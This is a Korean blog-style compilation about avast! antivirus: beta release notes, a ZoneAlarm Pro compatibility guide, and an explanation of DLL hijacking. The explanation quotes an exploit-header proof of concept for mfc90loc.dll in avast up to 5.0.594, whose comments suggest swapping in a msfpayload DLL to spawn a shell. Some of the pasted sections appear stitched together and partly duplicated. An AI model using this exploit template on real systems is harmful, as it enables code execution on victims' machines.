어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.
이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.
•무료 제품: http://files.avast.com/files/beta/5.0.656/setup_av_free.exe
• 프로 제품: http://files.avast.com/files/beta/5.0.656/setup_av_pro.exe
• 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.656/setup_ais.exe
기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.
어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.
• 어베스트! 서비스가 사자리는 문제점 해결
• 행동방어: 안정성 문제 해결(aswSP.sys)
• 어베스트! 샌드박스에서 안정서 및 성능 향상
• 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
• 업데이트 속도 향상
• IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
• IS: 새로운 안티스팸 엔진으로 업그레이드
• GUI에서 일부 사항 변경 및 버그 수정
• 스크린 리더 지원 향상
• 언어 추가: 덴마크어, 헤브류어
최근 보안 아니 윈도우 업계를 강타하고 있는 취약점이 바로 DLL Hijacking입니다. DLL은 윈도우 실행파일이 참조하는 라이브러리 파일인데, 문제는 DLL 파일의 경로를 제대로 검증하지 않아 이를 통해 공격을 하는 형태로 이미 예전부터 예견되어 있던 취약점입니다.
DLL Hijacking 취약점에 대한 자세한 사항은 아래 링크를 참고하시면 금방 이해가 되실 것으로 생각됩니다.
하여튼, 어베스트! 안티바이러스 제품의 최신 버전에서도 DLL Hijacking 취약점을 가지고 있는 것으로 알려져 있습니다. 어베스트!의 최신 버전은 V5.0.594이며, mfc90loc.dll 파일에서 이 취약점이 존재합니다. mfc90loc.dll은 라이선스 파일에 관련된 DLL 입니다.
# Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
# Date: 25/08/2010
# Author: Bruno Filipe (diwr) http://digitalacropolis.us
# Software Link: http://www.avast.com <http://www.bsplayer.org>
# Version: <= 5.0.594
# Tested on: WinXP SP2, WinXP SP3
# Thx TheLeader ;)
#
----------------------------------------------------------------------------------------------------------
# This should work with avast license files (.avastlic)
# 1. gcc dllmain.c -o mfc90loc.dll
# 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
anything.avastlic)
# 3. You can generate a msfpayload DLL and spawn a shell, for example.
#
----------------------------------------------------------------------------------------------------------
#include <windows.h>
int main()
{
WinExec("calc", SW_NORMAL);
exit(0);
return 0;
}
기 존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 베타였던 V5.0.542를 설치하여 사용중이라도 업데이트할 수 있습니다.
어베스트! V5.0.533 베타에서 개선되거나 추가된 기능은 다음과 같습니다.
• 오진 접수 시스템에 관련된 문제점 해결
• 행동기반 방어(Behavior Shield)의 루트킷 탐지 부분의 성능 향상
• 샌드박스: 많은 기능 추가, 안정성 및 성능 향상
• 방화벽: VPN 호환성 문제 해결(Public zone에서도 정상적으로 동작함)
• 방화벽: afwServ.exe 프로세스가 중단/충돌하는 문제점 해결
• 스크린 리더와의 호환성 향상
• 아웃룩 안티스팸 애드인의 다양한 문제점 해결
• 오른쪽에서 왼쪽 인터페이스 지원
• 언어 추가: 아라비아어, 크로아티아어
주의: 이 강좌에서 제공하는 내용은 원래 어베스트! 안티바이러스와 함께 사용하는 것을 추천하지 않습니다. 다만, 당사의 실험 결과, 설정 사항을 변경할 경우에 약간의 문제점을 가지고 있지만 사용상 문제가 없는 것으로 판단되어 정보로 제공하는 것입니다. 따라서, 이러한 구성을 사용할 때에는 사용자의 주의깊은 판단이 요구된다는 점을 알려 드립니다.
컴퓨터에 능숙한 사용자는 보안상 문제점을 고려하여 바이러스 백신뿐만 아니라 개인용 방화벽 프로그램을 함께 사용하는 경우가 많습니다.
바이러스 백신인 어베스트! 안티 바이러스와 방화벽 제품인 Zone Alarm Pro를 함께 사용하려고 하는 경우가 있습니다. Zone Alarm Pro를 설치하고 재부팅을 하고 나면 다음과 같은 오류화면을 볼 수 있습니다.
무조건 예(Yes)를 누르는 묻지마 신공을 하지 않고, 한번 더 무슨 경고 창인지 살펴 봐야 합니다. 경고 창의 내용은 다음과 같습니다.
어베스트! 안티 바이러스에서는 인터넷 브라우저를 통해 감염되는 경로를 차단하기 위해 웹 방어 프로바이더를 제공하는데, 이 부분에서 Zone Alarm Pro와 충돌이 발생합니다. 따라서, 웹 방어 프로바이더의 일부 기능을 중지할지를 묻는 것입니다.
따라서, 이 문제를 해결하는 방안은 모두 2가지 입니다.
1. 웹 방어 프로바이더의 프락시 모드 해제: 위의 그림에서 Yes를 클릭합니다. 2. Zone Alarm Pro에서 해당 항목의 감시 수준을 낮추거나, 중지: 아래에서 설명합니다
물론, 이 문제를 해결하는 가장 좋은 방법은 Zone Alarm Pro를 곧바로 삭제하면 되지만, 사용자가 원하는 방향은 설정을 변경하여 함께 사용하길 원할 것입니다.
Zone Alarm Pro를 실행하고 다음의 설정 사항을 변경합니다.
Privacy -> Main 메뉴에서 3가지 항목 모두 OFF
그리고, 선택사항으로 Anti-Spyware 감시 기능을 해제합니다.
Anti-spyware -> Main 메뉴에서 OFF
참고: Zone Alarm Pro와 Free Zone Alarm은 서로다른 제품입니다. 위에서 언급한 내용은 Pro에만 해당됩니다. 만약, Free 버전을 사용하면서 실수로 Web proxy 모드 확인 대화상자에서 "예"를 누른 경우에는 다음의 조치를 취해야 합니다.
1. 탐색기를 열고 어베스트! 안티 바이러스가 설치된 경로 아래 DATA 폴더로 이동합니다. (보통, C:\Program Files\Alwil Software\Avast4\DATA)
2. 메모장으로 avast4.ini 파일을 엽니다.
3. ZoneAlarmCompatibility=1 항목을 찾아 지우거나, 값을 0으로 바꾸고, 저장합니다.
4. 재부팅합니다.
다양한 개인용 방화벽 제품을 테스트하고 있습니다. 어베스트! 안티바이러스 사용시 가장 안정적으로 혼용하여 사용할 수 있는 방화벽으로 COMODO로 나타나고 있습니다
